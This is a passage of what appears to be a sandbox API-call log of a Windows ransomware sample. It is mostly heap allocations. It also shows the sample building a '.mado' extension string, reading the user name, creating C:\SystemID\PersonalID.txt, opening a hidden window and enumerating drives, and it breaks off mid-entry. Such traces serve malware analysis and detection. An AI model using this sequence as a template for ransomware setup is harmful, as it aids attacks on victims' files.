RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e30e8 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e3350 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80a) returned 0x32d9600 [0198.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e2e0, cbMultiByte=-1, lpWideCharStr=0x32d9600, cchWideChar=1029 | out: lpWideCharStr=".mado") returned 6 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x32d9e18 [0198.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d9600 | out: hHeap=0x2c0000) returned 1 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x313638 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6a98 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3208 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfd48 [0198.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6a98 | out: hHeap=0x2c0000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3843e0 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x32ee068 [0198.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bfd48 | out: hHeap=0x2c0000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce558 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384448 [0198.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ee068 | out: hHeap=0x2c0000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed00 [0198.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384448 | out: hHeap=0x2c0000) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce708 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd8) returned 0x3a66e8 [0198.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed00 | out: hHeap=0x2c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3138b8 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384448 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x138) returned 0x32c1738 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a66e8 | out: hHeap=0x2c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce678 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c33c0 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3418 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce798 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c8) returned 0x32f3b88 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1738 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313638 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3843e0 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ce558 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ce708 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3138b8 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384448 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ce678 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c33c0 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3418 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ce798 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f3b88 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x32f7dc8 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e35b8 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e3820 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330af78 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330b1e0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330b448 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330b6b0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330b918 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330bb80 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330bde8 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x330c050 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x329e050 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x32c1738 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e050 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x3188b8 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1738 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x327020 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3188b8 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x32da630 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327020 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x32c9c0 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32da630 | out: hHeap=0x2c0000) returned 1 [0198.643] GetUserNameW (in: lpBuffer=0x18e4e0, pcbBuffer=0x18e354 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18e354) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x590) returned 0x32e590 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6a98 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfd48 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6a98 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x32ee068 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bfd48 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384448 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ee068 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed00 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384448 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd8) returned 0x3a66e8 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed00 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x138) returned 0x32c1738 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a66e8 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3138b8 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c8) returned 0x32f3b88 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1738 | out: hHeap=0x2c0000) returned 1 [0198.685] GetLastError () returned 0x0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x313638 [0198.685] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8468 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8490 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f84b8 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x327020 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f3b88 | out: hHeap=0x2c0000) returned 1 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f84e0 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfd48 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bff40 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8508 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8530 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8558 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8580 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3f0) returned 0x32da630 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327020 | out: hHeap=0x2c0000) returned 1 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f85a8 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f85d0 [0198.686] GetLastError () returned 0x0 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f85f8 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bffb0 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfbf8 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8620 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8648 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e8) returned 0x32b6e58 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32da630 | out: hHeap=0x2c0000) returned 1 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8670 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8698 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f86c0 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f86e8 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8710 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8738 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfcd8 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bffe8 [0198.687] GetLastError () returned 0x0 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8760 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8788 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f87b0 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f87d8 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8800 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8828 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x32e9b70 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b6e58 | out: hHeap=0x2c0000) returned 1 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8850 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8878 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0020 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0058 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f88a0 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f88c8 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f88f0 [0198.688] GetLastError () returned 0x0 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8918 [0198.688] GetLastError () returned 0x0 [0198.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f8940 [0198.689] GetLastError () returned 0x0 [0198.697] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e048, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.698] GetLastError () returned 0x3 [0198.698] GetLastError () returned 0x3 [0198.698] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0198.699] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18e048, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0198.701] GetFileType (hFile=0x5b4) returned 0x1 [0198.701] GetLastError () returned 0x0 [0198.712] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.742] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0198.742] RegisterClassExW (param_1=0x18e2c0) returned 0xc11d [0198.742] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20148 [0198.764] NtdllDefWindowProc_W () returned 0x0 [0198.764] NtdllDefWindowProc_W () returned 0x1 [0198.767] NtdllDefWindowProc_W () returned 0x0 [0198.894] NtdllDefWindowProc_W () returned 0x0 [0198.894] ShowWindow (hWnd=0x20148, nCmdShow=0) returned 0 [0198.894] UpdateWindow (hWnd=0x20148) returned 1 [0198.894] GetLogicalDrives () returned 0x4 [0198.894] SetErrorMode (uMode=0x1) returned 0x0 [0198.895] PathFileExistsA (pszPath="C:\\") returned 1 [0198.895] SetErrorMode (uMode=0x0) returned 0x1 [0198.895] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0198.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x32ea448 [0198.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e278, cbMultiByte=-1, lpWideCharStr=0x32ea448, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0198.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3313060 [0198.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea448 | out: hHeap=0x2c0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6a98 [0198.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3313060 | out: hHeap=0x2c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6a98 | out: hHeap=0x2c0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6a98 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32d0a28 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x32ea448 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3313060 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3331630 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x3313878 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3843e0 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x330ef60 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x660) returned 0x32ead40 [0198.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x333ff88 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3340810 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3341098 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3341920 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x33421a8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x330f778 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3342a30 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x33432b8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x330ffc0 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x334ff70 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x33507d8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3343b40 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x33443c8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3351040 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3351888 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3344c50 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x33454d8 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3345d60 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x33465e8 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3346e70 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x33476f8 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3347f80 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3348808 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3349090 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3349918 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x33520d0 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3352938 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x334a1a0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x334aa28 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x334b2b0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x33531a0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x33539e8 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x334bb38 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x334c3c0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x334cc48 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x334d4d0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x334dd58 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x334e5e0 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x334ee68 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3354248 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3354ad0 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3364230 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3364a98 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3355358 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3355be0 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3356468 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3365300 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3356cf0 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3357578 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3357e00 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3358688 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3358f10 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3359798 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x335a020 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x335a8a8 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x335b130 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x335b9b8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3365b48 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x33663b0 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x335c240 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x335cac8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 